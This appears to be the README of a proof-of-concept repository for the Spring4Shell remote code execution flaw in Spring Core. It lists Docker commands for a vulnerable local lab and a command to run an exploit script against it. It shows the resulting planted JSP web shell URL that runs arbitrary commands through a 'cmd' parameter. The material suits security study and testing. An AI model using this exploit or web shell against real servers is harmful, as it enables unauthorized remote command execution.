
Another spring4shell (Spring core RCE) POC
This vulnerability affects Spring Core and allows an attacker to send a specially crafted HTTP request to bypass protections in the library’s HTTP request parser, leading to remote code execution.
More info Here

In order for this vulnerability to be exploited, several conditions must be met
docker build . -t springshell-rce-poc
docker run --rm -p 8081:8080 --name springshell-rce-poc springshell-rce-poc
python exploit-poc.py --url "http://127.0.0.1:8081/"
The expected response
exploiting
Shell URL:http://127.0.0.1:8081/tomcatwar.jsp?pwd=j&cmd=whoami
If you accessed this url, it will run whatever command you want cmd=<whatyouwant>

If you ssh the container you will see a new file has been created tomcatwar.jsp
docker exec -it springshell-rce-poc /bin/bash
ls /usr/local/tomcat/webapps/ROOT